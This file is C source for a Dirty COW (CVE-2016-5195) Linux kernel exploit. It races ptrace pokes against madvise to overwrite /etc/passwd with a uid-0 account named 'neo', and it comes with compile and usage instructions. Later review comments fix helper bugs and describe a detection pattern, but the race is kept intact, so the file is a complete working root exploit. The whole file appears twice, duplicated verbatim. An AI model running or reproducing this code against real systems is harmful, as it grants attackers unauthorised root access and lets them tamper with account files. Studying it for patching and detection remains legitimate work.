  1. //
  2. // This exploit uses the pokemon exploit of the dirtycow vulnerability
  3. // as a base and automatically generates a new passwd line.
  4. // The user will be prompted for the new password when the binary is run.
  5. // The original /etc/passwd file is then backed up to /tmp/passwd.bak
  6. // and overwrites the root account with the generated line.
  7. // After running the exploit you should be able to login with the newly
  8. // created user.
  9. //
  10. // To use this exploit modify the user values according to your needs.
  11. // The default is "neo".
  12. //
  13. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
  14. // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
  15. //
  16. // Compile with:
  17. // gcc -pthread dirty.c -o dirty -lcrypt
  18. //
  19. // Then run the newly created binary by either doing:
  20. // "./dirty" or "./dirty my-new-password"
  21. //
  22. // Afterwards, you can either "su neo" or "ssh neo@..."
  23. //
  24. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
  25. // mv /tmp/passwd.bak /etc/passwd
  26. //
  27. // Exploit adopted by Christian "neo" Mehlmauer
  28. // https://neo.at
  29. //
  30.  
  31. #include <fcntl.h>
  32. #include <pthread.h>
  33. #include <string.h>
  34. #include <stdio.h>
  35. #include <stdint.h>
  36. #include <sys/mman.h>
  37. #include <sys/types.h>
  38. #include <sys/stat.h>
  39. #include <sys/wait.h>
  40. #include <sys/ptrace.h>
  41. #include <stdlib.h>
  42. #include <unistd.h>
  43. #include <crypt.h>
  44.  
// Path of the file the race below rewrites.
const char *filename = "/etc/passwd";
// Where copy_file() puts the pre-run copy; the header says to restore from here.
// NOTE(review): a fixed, predictable path under world-writable /tmp; copy_file()
// refuses to overwrite it, so anything already at this path blocks the run.
const char *backup_filename = "/tmp/passwd.bak";
// Salt passed to crypt(3). Being fixed, the same password always yields the same
// hash; a salt without a "$id$" prefix presumably selects the legacy DES scheme
// on common libcs — confirm on the target system.
const char *salt = "neo";

// Process-wide state shared between main(), the forked child and the madvise
// thread; none of these are static, so they have external linkage.
int f;            // read-only descriptor of `filename`, opened in main()
void *map;        // PROT_READ/MAP_PRIVATE mapping of `filename`, set in main()
pid_t pid;        // fork() result: child pid in the parent, 0 in the child
pthread_t pth;    // the madvise thread, created by the child in main()
struct stat st;   // fstat() of `filename`; st.st_size sizes the mapping
  54.  
// One passwd(5) entry. generate_passwd_line() formats it as
// "name:hash:uid:gid:info:home:shell\n". The string fields are borrowed:
// main() assigns string literals and crypt()'s result, and nothing here
// frees them.
struct Userinfo {
    char *username;  // login name
    char *hash;      // crypt(3) output; becomes the password field
    int user_id;     // numeric uid (0 = root)
    int group_id;    // numeric gid
    char *info;      // GECOS/comment field
    char *home_dir;  // home directory
    char *shell;     // login shell
};
  64.  
/*
 * Hash a plaintext password with crypt(3) and the file-level `salt`.
 *
 * Returns crypt()'s result unchanged: on success a pointer into crypt's
 * internal buffer, which the next crypt() call in this process overwrites;
 * on failure NULL (or an implementation-specific failure token) — the
 * caller must check before using it. The fixed salt means repeated runs
 * with the same password produce the same hash.
 */
char *generate_password_hash(char *plaintext_pw) {
    char *hashed = crypt(plaintext_pw, salt);
    return hashed;
}
  68.  
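/*
 * Format one passwd(5) line, "name:hash:uid:gid:info:home:shell\n", from u.
 *
 * Returns a malloc'ed, NUL-terminated string that the caller must free(),
 * or NULL if any string field is NULL (e.g. crypt() failed upstream), if
 * formatting fails, or if allocation fails. The original wrote with
 * sprintf() into an unchecked malloc() result and passed NULL fields
 * straight to "%s". Fields are inserted verbatim: a ':' or '\n' inside one
 * would corrupt the line, so the caller is expected to control them.
 */
char *generate_passwd_line(struct Userinfo u) {
    const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
    // "%s" with a NULL argument is undefined behaviour; refuse up front.
    if (u.username == NULL || u.hash == NULL || u.info == NULL ||
        u.home_dir == NULL || u.shell == NULL) {
        return NULL;
    }
    // Measuring pass; snprintf() returns a negative value on an encoding error.
    int size = snprintf(NULL, 0, format, u.username, u.hash,
                        u.user_id, u.group_id, u.info, u.home_dir, u.shell);
    if (size < 0) {
        return NULL;
    }
    char *ret = malloc((size_t)size + 1);
    if (ret == NULL) {
        return NULL;
    }
    // Bounded write into the buffer sized by the measuring pass above.
    snprintf(ret, (size_t)size + 1, format, u.username, u.hash, u.user_id,
             u.group_id, u.info, u.home_dir, u.shell);
    return ret;
}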
  78.  
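/*
 * Thread body run in the forked child: the madvise(MADV_DONTNEED) side of
 * the Dirty COW race, repeatedly dropping the first 100 bytes of the global
 * private mapping `map` that main() set up. The iteration count and length
 * are the original author's tuning and are kept unchanged.
 *
 * arg is unused. Returns NULL: a pthread start routine must return a value,
 * and the original fell off the end of the function, which is undefined
 * behaviour when pthread's wrapper collects the result.
 */
void *madviseThread(void *arg) {
    (void)arg;
    int c = 0;
    for (int i = 0; i < 200000000; i++) {
        // madvise() returns 0 on success and -1 on error; c sums those.
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
    return NULL;
}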
  86.  
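/*
 * Copy the file at `from` to a newly created file at `to` (used to back up
 * the target file before it is modified).
 *
 * Returns 0 on success and -1 if `to` already exists, either file cannot be
 * opened, or a read/write error occurs. An existing `to` is reported with a
 * message and never touched; a partially written `to` is removed on failure
 * so a rerun is not blocked by a truncated backup.
 *
 * Fixes relative to the original: the loop variable was a `char`, so a
 * 0xFF byte compared equal to EOF and ended the copy early (with an unsigned
 * char it could never match EOF); writes and the final fclose() of the
 * target were unchecked, so a short backup was still reported as a success;
 * and the access()/fopen() pair left a window in which the predictable /tmp
 * path could be created by someone else (TOCTOU) — the "x" mode flag makes
 * create-if-absent atomic and also refuses a symlink planted at that path.
 */
int copy_file(const char *from, const char *to) {
    // Keep the original user-facing check and message.
    if (access(to, F_OK) != -1) {
        printf("File %s already exists! Please delete it and run again\n",
               to);
        return -1;
    }

    FILE *source = fopen(from, "rb");
    if (source == NULL) {
        return -1;
    }
    // "x" (C11): fail instead of truncating if `to` appeared since the
    // check above (O_CREAT|O_EXCL semantics).
    FILE *target = fopen(to, "wbx");
    if (target == NULL) {
        fclose(source);
        return -1;
    }

    int rc = 0;
    unsigned char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, source)) > 0) {
        if (fwrite(buf, 1, n, target) != n) {
            rc = -1;
            break;
        }
    }
    // A read error also ends the loop with n == 0; distinguish it from EOF.
    if (ferror(source)) {
        rc = -1;
    }

    // fclose() flushes buffered output; if that fails the backup is
    // incomplete and must not be reported as successful.
    if (fclose(target) != 0) {
        rc = -1;
    }
    fclose(source);

    if (rc != 0) {
        // We created `to` ourselves (see "x" above), so removing it is safe.
        remove(to);
        return rc;
    }
    printf("%s successfully backed up to %s\n",
           from, to);
    return 0;
}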
  120.  
/*
 * Entry point. Backs up the target file, builds the replacement passwd line
 * from the values below plus a password taken from argv[1] or getpass(),
 * then runs the ptrace/madvise race against a private read-only mapping of
 * the target. Several system calls are unchecked (see the NOTE(review)
 * comments); the race itself is left exactly as the original author wrote it.
 * Observable pattern for defenders: a process that calls PTRACE_TRACEME and
 * stops itself while a sibling thread loops on madvise(MADV_DONTNEED) over a
 * private file mapping, with the parent issuing ptrace pokes in a tight loop.
 */
int main(int argc, char *argv[])
{
    // backup file
    // copy_file() refuses to run if the backup path already exists, so a
    // previous run has to be restored/cleaned up first.
    int ret = copy_file(filename, backup_filename);
    if (ret != 0) {
        exit(ret);
    }

    struct Userinfo user;
    // set values, change as needed
    // uid/gid 0 make the entry root-equivalent.
    user.username = "neo";
    user.user_id = 0;
    user.group_id = 0;
    user.info = "pwned";
    user.home_dir = "/root";
    user.shell = "/bin/bash";

    char *plaintext_pw;

    if (argc >= 2) {
        // NOTE(review): a password given on the command line is visible in
        // the process list and may end up in shell history; it is also
        // echoed here.
        plaintext_pw = argv[1];
        printf("Please enter the new password: %s\n", plaintext_pw);
    } else {
        // getpass() reads without echo; its buffer is static.
        plaintext_pw = getpass("Please enter the new password: ");
    }

    // NOTE(review): crypt() may return NULL and generate_passwd_line() may
    // return NULL; neither is checked before being printed and used below
    // (strlen() on NULL would crash).
    user.hash = generate_password_hash(plaintext_pw);
    char *complete_passwd_line = generate_passwd_line(user);
    printf("Complete line:\n%s\n", complete_passwd_line);

    // Private, read-only mapping of the target; the extra sizeof(long) is
    // presumably because the pokes below write one long at a time.
    // NOTE(review): open(), fstat() and mmap() results are unchecked; an
    // unreadable target gives f == -1 and map == MAP_FAILED, and the code
    // carries on regardless.
    f = open(filename, O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL,
               st.st_size + sizeof(long),
               PROT_READ,
               MAP_PRIVATE,
               f,
               0);
    printf("mmap: %lx\n",(unsigned long)map);
    // NOTE(review): fork() failure (-1) is not distinguished from the parent
    // path below.
    pid = fork();
    if(pid) {
        // Parent: wait for the child to stop itself (it is now our tracee),
        // then poke the new line into the mapping one long per offset, in
        // 10000/l rounds of 10000 pokes per offset.
        waitpid(pid, NULL, 0);
        int u, i, o, c = 0;
        int l=strlen(complete_passwd_line);
        for(i = 0; i < 10000/l; i++) {
            for(o = 0; o < l; o++) {
                for(u = 0; u < 10000; u++) {
                    // NOTE(review): the poke value is read as a long from
                    // complete_passwd_line + o, so the last offsets read up
                    // to sizeof(long)-1 bytes past the malloc'ed string
                    // (out-of-bounds read). `map + o` is arithmetic on
                    // void*, a GNU extension. c sums ptrace()'s 0/-1 results.
                    c += ptrace(PTRACE_POKETEXT,
                                pid,
                                map + o,
                                *((long*)(complete_passwd_line + o)));
                }
            }
        }
        printf("ptrace %d\n",c);
    }
    else {
        // Child: start the madvise thread, become traceable by the parent,
        // stop, and wait for the thread to finish.
        // NOTE(review): kill()/SIGSTOP are declared in <signal.h>, which this
        // file does not include directly (it relies on a transitive include);
        // pthread_create()'s return value is unchecked.
        pthread_create(&pth,
                       NULL,
                       madviseThread,
                       NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        pthread_join(pth,NULL);
    }

    // Both the parent and the child reach these lines, so they print twice.
    // Nothing verifies that the target was actually changed.
    printf("Done! Check %s to see if the new user was created\n", filename);
    // NOTE(review): echoes the plaintext password to stdout.
    printf("You can log in with username %s and password %s.\n\n",
           user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
           filename, backup_filename);
    return 0;
}
  194. //
  195. // This exploit uses the pokemon exploit of the dirtycow vulnerability
  196. // as a base and automatically generates a new passwd line.
  197. // The user will be prompted for the new password when the binary is run.
  198. // The original /etc/passwd file is then backed up to /tmp/passwd.bak
  199. // and overwrites the root account with the generated line.
  200. // After running the exploit you should be able to login with the newly
  201. // created user.
  202. //
  203. // To use this exploit modify the user values according to your needs.
  204. // The default is "neo".
  205. //
  206. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
  207. // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
  208. //
  209. // Compile with:
  210. // gcc -pthread dirty.c -o dirty -lcrypt
  211. //
  212. // Then run the newly created binary by either doing:
  213. // "./dirty" or "./dirty my-new-password"
  214. //
  215. // Afterwards, you can either "su neo" or "ssh neo@..."
  216. //
  217. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
  218. // mv /tmp/passwd.bak /etc/passwd
  219. //
  220. // Exploit adopted by Christian "neo" Mehlmauer
  221. // https://neo.at
  222. //
  223.  
  224. #include <fcntl.h>
  225. #include <pthread.h>
  226. #include <string.h>
  227. #include <stdio.h>
  228. #include <stdint.h>
  229. #include <sys/mman.h>
  230. #include <sys/types.h>
  231. #include <sys/stat.h>
  232. #include <sys/wait.h>
  233. #include <sys/ptrace.h>
  234. #include <stdlib.h>
  235. #include <unistd.h>
  236. #include <crypt.h>
  237.  
// Path of the file the race below rewrites.
const char *filename = "/etc/passwd";
// Where copy_file() puts the pre-run copy; the header says to restore from here.
// NOTE(review): a fixed, predictable path under world-writable /tmp; copy_file()
// refuses to overwrite it, so anything already at this path blocks the run.
const char *backup_filename = "/tmp/passwd.bak";
// Salt passed to crypt(3). Being fixed, the same password always yields the same
// hash; a salt without a "$id$" prefix presumably selects the legacy DES scheme
// on common libcs — confirm on the target system.
const char *salt = "neo";

// Process-wide state shared between main(), the forked child and the madvise
// thread; none of these are static, so they have external linkage.
int f;            // read-only descriptor of `filename`, opened in main()
void *map;        // PROT_READ/MAP_PRIVATE mapping of `filename`, set in main()
pid_t pid;        // fork() result: child pid in the parent, 0 in the child
pthread_t pth;    // the madvise thread, created by the child in main()
struct stat st;   // fstat() of `filename`; st.st_size sizes the mapping
  247.  
// One passwd(5) entry. generate_passwd_line() formats it as
// "name:hash:uid:gid:info:home:shell\n". The string fields are borrowed:
// main() assigns string literals and crypt()'s result, and nothing here
// frees them.
struct Userinfo {
    char *username;  // login name
    char *hash;      // crypt(3) output; becomes the password field
    int user_id;     // numeric uid (0 = root)
    int group_id;    // numeric gid
    char *info;      // GECOS/comment field
    char *home_dir;  // home directory
    char *shell;     // login shell
};
  257.  
/*
 * Hash a plaintext password with crypt(3) and the file-level `salt`.
 *
 * Returns crypt()'s result unchanged: on success a pointer into crypt's
 * internal buffer, which the next crypt() call in this process overwrites;
 * on failure NULL (or an implementation-specific failure token) — the
 * caller must check before using it. The fixed salt means repeated runs
 * with the same password produce the same hash.
 */
char *generate_password_hash(char *plaintext_pw) {
    char *hashed = crypt(plaintext_pw, salt);
    return hashed;
}
  261.  
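/*
 * Format one passwd(5) line, "name:hash:uid:gid:info:home:shell\n", from u.
 *
 * Returns a malloc'ed, NUL-terminated string that the caller must free(),
 * or NULL if any string field is NULL (e.g. crypt() failed upstream), if
 * formatting fails, or if allocation fails. The original wrote with
 * sprintf() into an unchecked malloc() result and passed NULL fields
 * straight to "%s". Fields are inserted verbatim: a ':' or '\n' inside one
 * would corrupt the line, so the caller is expected to control them.
 */
char *generate_passwd_line(struct Userinfo u) {
    const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
    // "%s" with a NULL argument is undefined behaviour; refuse up front.
    if (u.username == NULL || u.hash == NULL || u.info == NULL ||
        u.home_dir == NULL || u.shell == NULL) {
        return NULL;
    }
    // Measuring pass; snprintf() returns a negative value on an encoding error.
    int size = snprintf(NULL, 0, format, u.username, u.hash,
                        u.user_id, u.group_id, u.info, u.home_dir, u.shell);
    if (size < 0) {
        return NULL;
    }
    char *ret = malloc((size_t)size + 1);
    if (ret == NULL) {
        return NULL;
    }
    // Bounded write into the buffer sized by the measuring pass above.
    snprintf(ret, (size_t)size + 1, format, u.username, u.hash, u.user_id,
             u.group_id, u.info, u.home_dir, u.shell);
    return ret;
}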
  271.  
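/*
 * Thread body run in the forked child: the madvise(MADV_DONTNEED) side of
 * the Dirty COW race, repeatedly dropping the first 100 bytes of the global
 * private mapping `map` that main() set up. The iteration count and length
 * are the original author's tuning and are kept unchanged.
 *
 * arg is unused. Returns NULL: a pthread start routine must return a value,
 * and the original fell off the end of the function, which is undefined
 * behaviour when pthread's wrapper collects the result.
 */
void *madviseThread(void *arg) {
    (void)arg;
    int c = 0;
    for (int i = 0; i < 200000000; i++) {
        // madvise() returns 0 on success and -1 on error; c sums those.
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
    return NULL;
}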
  279.  
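/*
 * Copy the file at `from` to a newly created file at `to` (used to back up
 * the target file before it is modified).
 *
 * Returns 0 on success and -1 if `to` already exists, either file cannot be
 * opened, or a read/write error occurs. An existing `to` is reported with a
 * message and never touched; a partially written `to` is removed on failure
 * so a rerun is not blocked by a truncated backup.
 *
 * Fixes relative to the original: the loop variable was a `char`, so a
 * 0xFF byte compared equal to EOF and ended the copy early (with an unsigned
 * char it could never match EOF); writes and the final fclose() of the
 * target were unchecked, so a short backup was still reported as a success;
 * and the access()/fopen() pair left a window in which the predictable /tmp
 * path could be created by someone else (TOCTOU) — the "x" mode flag makes
 * create-if-absent atomic and also refuses a symlink planted at that path.
 */
int copy_file(const char *from, const char *to) {
    // Keep the original user-facing check and message.
    if (access(to, F_OK) != -1) {
        printf("File %s already exists! Please delete it and run again\n",
               to);
        return -1;
    }

    FILE *source = fopen(from, "rb");
    if (source == NULL) {
        return -1;
    }
    // "x" (C11): fail instead of truncating if `to` appeared since the
    // check above (O_CREAT|O_EXCL semantics).
    FILE *target = fopen(to, "wbx");
    if (target == NULL) {
        fclose(source);
        return -1;
    }

    int rc = 0;
    unsigned char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, source)) > 0) {
        if (fwrite(buf, 1, n, target) != n) {
            rc = -1;
            break;
        }
    }
    // A read error also ends the loop with n == 0; distinguish it from EOF.
    if (ferror(source)) {
        rc = -1;
    }

    // fclose() flushes buffered output; if that fails the backup is
    // incomplete and must not be reported as successful.
    if (fclose(target) != 0) {
        rc = -1;
    }
    fclose(source);

    if (rc != 0) {
        // We created `to` ourselves (see "x" above), so removing it is safe.
        remove(to);
        return rc;
    }
    printf("%s successfully backed up to %s\n",
           from, to);
    return 0;
}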
  313.  
/*
 * Entry point. Backs up the target file, builds the replacement passwd line
 * from the values below plus a password taken from argv[1] or getpass(),
 * then runs the ptrace/madvise race against a private read-only mapping of
 * the target. Several system calls are unchecked (see the NOTE(review)
 * comments); the race itself is left exactly as the original author wrote it.
 * Observable pattern for defenders: a process that calls PTRACE_TRACEME and
 * stops itself while a sibling thread loops on madvise(MADV_DONTNEED) over a
 * private file mapping, with the parent issuing ptrace pokes in a tight loop.
 */
int main(int argc, char *argv[])
{
    // backup file
    // copy_file() refuses to run if the backup path already exists, so a
    // previous run has to be restored/cleaned up first.
    int ret = copy_file(filename, backup_filename);
    if (ret != 0) {
        exit(ret);
    }

    struct Userinfo user;
    // set values, change as needed
    // uid/gid 0 make the entry root-equivalent.
    user.username = "neo";
    user.user_id = 0;
    user.group_id = 0;
    user.info = "pwned";
    user.home_dir = "/root";
    user.shell = "/bin/bash";

    char *plaintext_pw;

    if (argc >= 2) {
        // NOTE(review): a password given on the command line is visible in
        // the process list and may end up in shell history; it is also
        // echoed here.
        plaintext_pw = argv[1];
        printf("Please enter the new password: %s\n", plaintext_pw);
    } else {
        // getpass() reads without echo; its buffer is static.
        plaintext_pw = getpass("Please enter the new password: ");
    }

    // NOTE(review): crypt() may return NULL and generate_passwd_line() may
    // return NULL; neither is checked before being printed and used below
    // (strlen() on NULL would crash).
    user.hash = generate_password_hash(plaintext_pw);
    char *complete_passwd_line = generate_passwd_line(user);
    printf("Complete line:\n%s\n", complete_passwd_line);

    // Private, read-only mapping of the target; the extra sizeof(long) is
    // presumably because the pokes below write one long at a time.
    // NOTE(review): open(), fstat() and mmap() results are unchecked; an
    // unreadable target gives f == -1 and map == MAP_FAILED, and the code
    // carries on regardless.
    f = open(filename, O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL,
               st.st_size + sizeof(long),
               PROT_READ,
               MAP_PRIVATE,
               f,
               0);
    printf("mmap: %lx\n",(unsigned long)map);
    // NOTE(review): fork() failure (-1) is not distinguished from the parent
    // path below.
    pid = fork();
    if(pid) {
        // Parent: wait for the child to stop itself (it is now our tracee),
        // then poke the new line into the mapping one long per offset, in
        // 10000/l rounds of 10000 pokes per offset.
        waitpid(pid, NULL, 0);
        int u, i, o, c = 0;
        int l=strlen(complete_passwd_line);
        for(i = 0; i < 10000/l; i++) {
            for(o = 0; o < l; o++) {
                for(u = 0; u < 10000; u++) {
                    // NOTE(review): the poke value is read as a long from
                    // complete_passwd_line + o, so the last offsets read up
                    // to sizeof(long)-1 bytes past the malloc'ed string
                    // (out-of-bounds read). `map + o` is arithmetic on
                    // void*, a GNU extension. c sums ptrace()'s 0/-1 results.
                    c += ptrace(PTRACE_POKETEXT,
                                pid,
                                map + o,
                                *((long*)(complete_passwd_line + o)));
                }
            }
        }
        printf("ptrace %d\n",c);
    }
    else {
        // Child: start the madvise thread, become traceable by the parent,
        // stop, and wait for the thread to finish.
        // NOTE(review): kill()/SIGSTOP are declared in <signal.h>, which this
        // file does not include directly (it relies on a transitive include);
        // pthread_create()'s return value is unchecked.
        pthread_create(&pth,
                       NULL,
                       madviseThread,
                       NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        pthread_join(pth,NULL);
    }

    // Both the parent and the child reach these lines, so they print twice.
    // Nothing verifies that the target was actually changed.
    printf("Done! Check %s to see if the new user was created\n", filename);
    // NOTE(review): echoes the plaintext password to stdout.
    printf("You can log in with username %s and password %s.\n\n",
           user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
           filename, backup_filename);
    return 0;
}